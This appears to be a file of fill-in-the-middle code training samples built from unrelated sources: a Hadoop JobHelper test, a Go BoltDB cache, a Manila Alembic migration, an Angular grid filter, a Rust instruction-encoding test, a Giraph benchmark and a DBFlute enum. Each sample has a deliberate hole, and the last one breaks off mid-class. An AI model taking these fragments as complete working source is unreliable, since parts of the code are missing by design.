Assert.assertEquals(dummyJarString, StringUtils.fromUtf8(IOUtils.toByteArray(fs.open(expectedJarPath))));
}
@Test
public void testIsSnapshot()
{
Assert.assertTrue(JobHelper.isSnapshot(new File("test-SNAPSHOT.jar")));
Assert.assertTrue(JobHelper.isSnapshot(new File("test-SNAPSHOT-selfcontained.jar")));
Assert.assertFalse(JobHelper.isSnapshot(new File("test.jar")));
Assert.assertFalse(JobHelper.isSnapshot(new File("test-selfcontained.jar")));
Assert.assertFalse(JobHelper.isSnapshot(new File("iAmNotSNAPSHOT.jar")));
Assert.assertFalse(JobHelper.isSnapshot(new File("iAmNotSNAPSHOT-selfcontained.jar")));
}
@Test
public void testConcurrentUpload() throws IOException, InterruptedException, ExecutionException, TimeoutException
{
final int concurrency = 10;
ListeningExecutorService pool = MoreExecutors.listeningDecorator(Executors.newFixedThreadPool(concurrency));
// barrier ensures that all jobs try to add files to classpath at same time.
final CyclicBarrier barrier = new CyclicBarrier(concurrency);
final DistributedFileSystem fs = miniCluster.getFileSystem();
final Path expectedJarPath = new Path(finalClasspath, dummyJarFile.getName());
List<ListenableFuture<Boolean>> futures = new ArrayList<>();<|fim▁hole|> pool.submit(
new Callable()
{
@Override
public Boolean call() throws Exception
{
int id = barrier.await();
Job job = Job.getInstance(conf, "test-job-" + id);
Path intermediatePathForJob = new Path(intermediatePath, "job-" + id);
JobHelper.addJarToClassPath(dummyJarFile, finalClasspath, intermediatePathForJob, fs, job);
// check file gets uploaded to final HDFS path
Assert.assertTrue(fs.exists(expectedJarPath));
// check that the intermediate file is not present
Assert.assertFalse(fs.exists(new Path(intermediatePathForJob, dummyJarFile.getName())));
// check file gets added to the classpath
Assert.assertEquals(
expectedJarPath.toString(),
job.getConfiguration().get(MRJobConfig.CLASSPATH_FILES)
);
return true;
}
}
)
);
}
Futures.allAsList(futures).get(30, TimeUnit.SECONDS);
pool.shutdownNow();
}
}<|fim▁end|> |
for (int i = 0; i < concurrency; i++) {
futures.add( |
<|file_name|>cache.go<|end_file_name|><|fim▁begin|>package config
import (
"log"
"os"
"os/user"
"path/filepath"
"koding/klient/storage"
"koding/tools/util"
"github.com/boltdb/bolt"
)
// CurrentUser represents current user that owns the KD process.
//
// If the process was started with sudo, the CurrentUser represents
// the user that invoked sudo.
var CurrentUser = currentUser()
// CacheOptions are used to configure Cache behavior for New method.
type CacheOptions struct {
File string
BoltDB *bolt.Options
Bucket []byte
Owner *User
}
func (o *CacheOptions) owner() *User {
if o.Owner != nil {
return o.Owner
}
return CurrentUser
}
// Cache is a file-based cached used to persist values between
// different runs of kd tool.
type Cache struct {
*storage.EncodingStorage
}
// NewCache returns new cache value.
//
// If it was not possible to create or open BoltDB database,
// an in-memory cache is created.
func NewCache(options *CacheOptions) *Cache {
db, err := newBoltDB(options)
if err != nil {
log.Println(err)
}<|fim▁hole|> return &Cache{
EncodingStorage: storage.NewEncodingStorage(db, options.Bucket),
}
}
// NewCache returns new cache value backed by BoltDB.
func NewBoltCache(options *CacheOptions) (*Cache, error) {
db, err := newBoltDB(options)
if err != nil {
return nil, err
}
bolt, err := storage.NewBoltStorageBucket(db, options.Bucket)
if err != nil {
return nil, err
}
return &Cache{
EncodingStorage: &storage.EncodingStorage{
Interface: bolt,
},
}, nil
}
func newBoltDB(o *CacheOptions) (*bolt.DB, error) {
dir := filepath.Dir(o.File)
// Best-effort attempts, ignore errors.
_ = os.MkdirAll(dir, 0755)
_ = util.Chown(dir, o.owner().User)
return bolt.Open(o.File, 0644, o.BoltDB)
}
func KodingHome() string {
home := os.Getenv("KODING_HOME")
if _, err := os.Stat(home); err != nil {
home = filepath.Join(CurrentUser.HomeDir, ".config", "koding")
}
return home
}
type User struct {
*user.User
Groups []*user.Group
}
func currentUser() *User {
u := &User{
User: currentStdUser(),
}
ids, err := u.GroupIds()
if err != nil {
return u
}
for _, id := range ids {
if g, err := user.LookupGroupId(id); err == nil {
u.Groups = append(u.Groups, g)
}
}
return u
}
func currentStdUser() *user.User {
u, err := user.Current()
if err != nil {
panic(err)
}
if u.Uid != "0" {
return u
}
if sudoU, err := user.Lookup(os.Getenv("SUDO_USER")); err == nil {
return sudoU
}
if rootU, err := user.Lookup(os.Getenv("USERNAME")); err == nil {
return rootU
}
return u
}<|fim▁end|> | |
<|file_name|>533646c7af38_remove_unused_attr_status.py<|end_file_name|><|fim▁begin|># Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Remove unused attr status
Revision ID: 533646c7af38
Revises: 3a482171410f
Create Date: 2015-05-28 13:13:47.651353<|fim▁hole|>"""
# revision identifiers, used by Alembic.
revision = '533646c7af38'
down_revision = '3a482171410f'
from alembic import op
from oslo_log import log
import sqlalchemy as sql
from manila.common import constants
from manila.i18n import _LE
LOG = log.getLogger(__name__)
COLUMN_NAME = 'status'
TABLE_NAMES = ('network_allocations', 'security_services')
def upgrade():
for t_name in TABLE_NAMES:
try:
op.drop_column(t_name, COLUMN_NAME)
except Exception:
LOG.error(_LE("Column '%s' could not be dropped"), COLUMN_NAME)
raise
def downgrade():
for t_name in TABLE_NAMES:
try:
op.add_column(
t_name,
sql.Column(
COLUMN_NAME,
# NOTE(vponomaryov): original type of attr was enum. But
# alembic is buggy with enums [1], so use string type
# instead. Anyway we have no reason to keep enum/constraint
# on specific set of possible statuses because they have
# not been used.
# [1] - https://bitbucket.org/zzzeek/alembic/
# issue/89/opadd_column-and-opdrop_column-should
sql.String(255),
default=constants.STATUS_NEW,
),
)
except Exception:
LOG.error(_LE("Column '%s' could not be added"), COLUMN_NAME)
raise<|fim▁end|> | |
<|file_name|>year-filter.component_angular.ts<|end_file_name|><|fim▁begin|>import { Component } from '@angular/core';
import { IFilterAngularComp } from "@ag-grid-community/angular";
@Component({
selector: 'year-filter',
template: `
<div class="year-filter">
<label>
<input type="radio" name="isFilterActive" [checked]="!isActive" (change)="toggleFilter(false)" /> All
</label>
<label>
<input type="radio" name="isFilterActive" [checked]="isActive" (change)="toggleFilter(true)" /> After 2004
</label>
</div>`
})
export class YearFilter implements IFilterAngularComp {
params: any;
isActive: boolean;
// called on init
agInit(params: any): void {
this.params = params;
this.isActive = false;
}
toggleFilter(isFilterActive): void {
this.isActive = isFilterActive;
this.params.filterChangedCallback();
}
doesFilterPass(params): boolean {
return params.data.year > 2004;
}
isFilterActive(): boolean {
return this.isActive;<|fim▁hole|> }
setModel(model): void {
this.toggleFilter(!!model);
}
onFloatingFilterChanged(value): void {
this.setModel(value);
}
}<|fim▁end|> | }
getModel(): boolean | null {
return this.isFilterActive() || null; |
<|file_name|>tests.py<|end_file_name|><|fim▁begin|>import unittest
from click.testing import CliRunner
from make_dataset import main
<|fim▁hole|>
class TestMain(unittest.TestCase):
def test_main_runs(self):
runner = CliRunner()
result = runner.invoke(main, ['.', '.'])
assert result.exit_code == 0<|fim▁end|> | |
<|file_name|>bndstx.rs<|end_file_name|><|fim▁begin|>use ::{BroadcastMode, Instruction, MaskReg, MergeMode, Mnemonic, OperandSize, Reg, RoundingMode};
use ::RegType::*;
use ::instruction_def::*;
use ::Operand::*;<|fim▁hole|>
fn bndstx_1() {
run_test(&Instruction { mnemonic: Mnemonic::BNDSTX, operand1: Some(IndirectScaledIndexed(ESI, ECX, One, Some(OperandSize::Unsized), None)), operand2: Some(Direct(BND3)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[15, 27, 28, 14], OperandSize::Dword)
}
fn bndstx_2() {
run_test(&Instruction { mnemonic: Mnemonic::BNDSTX, operand1: Some(IndirectScaledIndexed(RDI, RBX, One, Some(OperandSize::Unsized), None)), operand2: Some(Direct(BND3)), operand3: None, operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[15, 27, 28, 31], OperandSize::Qword)
}<|fim▁end|> | use ::Reg::*;
use ::RegScale::*; |
<|file_name|>ShortestPathsBenchmark.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.giraph.benchmark;
import org.apache.commons.cli.CommandLine;
import org.apache.commons.cli.CommandLineParser;
import org.apache.commons.cli.HelpFormatter;
import org.apache.commons.cli.Options;
import org.apache.commons.cli.PosixParser;
import org.apache.giraph.GiraphConfiguration;
import org.apache.giraph.examples.MinimumDoubleCombiner;
import org.apache.giraph.graph.EdgeListVertex;
import org.apache.giraph.graph.GiraphJob;
import org.apache.giraph.io.PseudoRandomVertexInputFormat;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.io.DoubleWritable;
import org.apache.hadoop.io.LongWritable;
import org.apache.hadoop.util.Tool;
import org.apache.hadoop.util.ToolRunner;
import org.apache.log4j.Logger;
import java.io.IOException;
/**
* Single-source shortest paths benchmark.
*/
public class ShortestPathsBenchmark implements Tool {
/** Class logger */
private static final Logger LOG =
Logger.getLogger(ShortestPathsBenchmark.class);
/** Configuration */
private Configuration conf;
/**
* Vertex implementation
*/
public static class ShortestPathsBenchmarkVertex extends
EdgeListVertex<LongWritable, DoubleWritable, DoubleWritable,
DoubleWritable> {
@Override
public void compute(Iterable<DoubleWritable> messages) throws IOException {
ShortestPathsComputation.computeShortestPaths(this, messages);
}
}
@Override
public Configuration getConf() {
return conf;
}
@Override
public void setConf(Configuration conf) {
this.conf = conf;
}
@Override
public final int run(final String[] args) throws Exception {
Options options = new Options();
options.addOption("h", "help", false, "Help");
options.addOption("v", "verbose", false, "Verbose");
options.addOption("w",
"workers",
true,
"Number of workers");
options.addOption("V",
"aggregateVertices",
true,
"Aggregate vertices");
options.addOption("e",
"edgesPerVertex",
true,
"Edges per vertex");
options.addOption("c",
"vertexClass",
true,
"Vertex class (0 for HashMapVertex, 1 for EdgeListVertex)");
options.addOption("nc",
"noCombiner",
false,
"Don't use a combiner");
HelpFormatter formatter = new HelpFormatter();
if (args.length == 0) {
formatter.printHelp(getClass().getName(), options, true);
return 0;
}
CommandLineParser parser = new PosixParser();
CommandLine cmd = parser.parse(options, args);
if (cmd.hasOption('h')) {
formatter.printHelp(getClass().getName(), options, true);
return 0;
}
if (!cmd.hasOption('w')) {
LOG.info("Need to choose the number of workers (-w)");
return -1;
}
if (!cmd.hasOption('V')) {
LOG.info("Need to set the aggregate vertices (-V)");
return -1;
}
if (!cmd.hasOption('e')) {
LOG.info("Need to set the number of edges " +
"per vertex (-e)");
return -1;
}
int workers = Integer.parseInt(cmd.getOptionValue('w'));
GiraphJob job = new GiraphJob(getConf(), getClass().getName());
if (!cmd.hasOption('c') ||
(Integer.parseInt(cmd.getOptionValue('c')) == 1)) {
job.getConfiguration().setVertexClass(ShortestPathsBenchmarkVertex.class);
} else {
job.getConfiguration().setVertexClass(
HashMapVertexShortestPathsBenchmark.class);
}
LOG.info("Using class " +
job.getConfiguration().get(GiraphConfiguration.VERTEX_CLASS));
job.getConfiguration().setVertexInputFormatClass(
PseudoRandomVertexInputFormat.class);
if (!cmd.hasOption("nc")) {
job.getConfiguration().setVertexCombinerClass(
MinimumDoubleCombiner.class);
}
job.getConfiguration().setWorkerConfiguration(workers, workers, 100.0f);<|fim▁hole|> Long.parseLong(cmd.getOptionValue('V')));
job.getConfiguration().setLong(
PseudoRandomVertexInputFormat.EDGES_PER_VERTEX,
Long.parseLong(cmd.getOptionValue('e')));
boolean isVerbose = false;
if (cmd.hasOption('v')) {
isVerbose = true;
}
if (job.run(isVerbose)) {
return 0;
} else {
return -1;
}
}
/**
* Execute the benchmark.
*
* @param args Typically the command line arguments.
* @throws Exception Any exception from the computation.
*/
public static void main(final String[] args) throws Exception {
System.exit(ToolRunner.run(new ShortestPathsBenchmark(), args));
}
}<|fim▁end|> | job.getConfiguration().setLong(
PseudoRandomVertexInputFormat.AGGREGATE_VERTICES, |
<|file_name|>CDef.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2004-2013 the Seasar Foundation and the Others.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language
* governing permissions and limitations under the License.
*/
package org.docksidestage.mysql.dbflute.allcommon;
import java.util.*;
import org.dbflute.exception.ClassificationNotFoundException;
import org.dbflute.jdbc.Classification;
import org.dbflute.jdbc.ClassificationCodeType;
import org.dbflute.jdbc.ClassificationMeta;
import org.dbflute.jdbc.ClassificationUndefinedHandlingType;
import org.dbflute.optional.OptionalThing;
import static org.dbflute.util.DfTypeUtil.emptyStrings;
/**
* The definition of classification.
* @author DBFlute(AutoGenerator)
*/
public interface CDef extends Classification {
/**
* 会員が受けられるサービスのランクを示す
*/
public enum ServiceRank implements CDef {
/** PLATINUM: platinum rank */
Platinum("PLT", "PLATINUM", emptyStrings())
,
/** GOLD: gold rank */
Gold("GLD", "GOLD", emptyStrings())
,
/** SILVER: silver rank */
Silver("SIL", "SILVER", emptyStrings())
,
/** BRONZE: bronze rank */
Bronze("BRZ", "BRONZE", emptyStrings())
,
/** PLASTIC: plastic rank (deprecated: テーブル区分値の非推奨要素指定のテストのため) */
@Deprecated
Plastic("PLS", "PLASTIC", emptyStrings())
;
private static final Map<String, ServiceRank> _codeClsMap = new HashMap<String, ServiceRank>();
private static final Map<String, ServiceRank> _nameClsMap = new HashMap<String, ServiceRank>();
static {
for (ServiceRank value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private ServiceRank(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.ServiceRank; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<ServiceRank> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof ServiceRank) { return OptionalThing.of((ServiceRank)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<ServiceRank> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static ServiceRank codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof ServiceRank) { return (ServiceRank)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static ServiceRank nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<ServiceRank> listAll() {
return new ArrayList<ServiceRank>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<ServiceRank> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: ServiceRank." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<ServiceRank> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<ServiceRank> clsList = new ArrayList<ServiceRank>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<ServiceRank> groupOf(String groupName) {
return new ArrayList<ServiceRank>(4);
}
@Override public String toString() { return code(); }
}
/**
* mainly region of member address
*/
public enum Region implements CDef {
/** アメリカ */
アメリカ("1", "アメリカ", emptyStrings())
,
/** カナダ */
カナダ("2", "カナダ", emptyStrings())
,
/** 中国 */
中国("3", "中国", emptyStrings())
,
/** 千葉 */
千葉("4", "千葉", emptyStrings())
;
private static final Map<String, Region> _codeClsMap = new HashMap<String, Region>();
private static final Map<String, Region> _nameClsMap = new HashMap<String, Region>();
static {
for (Region value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private Region(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.Region; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<Region> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof Region) { return OptionalThing.of((Region)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<Region> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static Region codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof Region) { return (Region)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static Region nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<Region> listAll() {
return new ArrayList<Region>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<Region> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: Region." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<Region> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<Region> clsList = new ArrayList<Region>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<Region> groupOf(String groupName) {
return new ArrayList<Region>(4);
}
@Override public String toString() { return code(); }
}
/**
* reason for member withdrawal
*/
public enum WithdrawalReason implements CDef {
/** SIT: サイトが使いにくいから */
Sit("SIT", "SIT", emptyStrings())
,
/** PRD: 商品に魅力がないから */
Prd("PRD", "PRD", emptyStrings())
,
/** FRT: フリテンだから */
Frt("FRT", "FRT", emptyStrings())
,
/** OTH: その他理由 */
Oth("OTH", "OTH", emptyStrings())
;
private static final Map<String, WithdrawalReason> _codeClsMap = new HashMap<String, WithdrawalReason>();
private static final Map<String, WithdrawalReason> _nameClsMap = new HashMap<String, WithdrawalReason>();
static {
for (WithdrawalReason value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private WithdrawalReason(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.WithdrawalReason; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<WithdrawalReason> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof WithdrawalReason) { return OptionalThing.of((WithdrawalReason)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<WithdrawalReason> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static WithdrawalReason codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof WithdrawalReason) { return (WithdrawalReason)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static WithdrawalReason nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<WithdrawalReason> listAll() {
return new ArrayList<WithdrawalReason>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<WithdrawalReason> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: WithdrawalReason." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<WithdrawalReason> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<WithdrawalReason> clsList = new ArrayList<WithdrawalReason>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<WithdrawalReason> groupOf(String groupName) {
return new ArrayList<WithdrawalReason>(4);
}
@Override public String toString() { return code(); }
}
/**
* 支払方法
*/
public enum PaymentMethod implements CDef {
/** 手渡し: Face-to-Faceの手渡しで商品と交換 */
ByHand("HAN", "手渡し", emptyStrings())
,
/** 銀行振込: 銀行振込で確認してから商品発送 */
BankTransfer("BAK", "銀行振込", emptyStrings())
,
/** クレジットカード: クレジットカードの番号を教えてもらう */
CreditCard("CRC", "クレジットカード", emptyStrings())
;
private static final Map<String, PaymentMethod> _codeClsMap = new HashMap<String, PaymentMethod>();
private static final Map<String, PaymentMethod> _nameClsMap = new HashMap<String, PaymentMethod>();
static {
for (PaymentMethod value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private PaymentMethod(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.PaymentMethod; }
/**
* Is the classification in the group? <br>
* 最も推奨されている方法 <br>
* The group elements:[ByHand]
* @return The determination, true or false.
*/
public boolean isRecommended() {
return ByHand.equals(this);
}
public boolean inGroup(String groupName) {
if ("recommended".equals(groupName)) { return isRecommended(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<PaymentMethod> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof PaymentMethod) { return OptionalThing.of((PaymentMethod)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
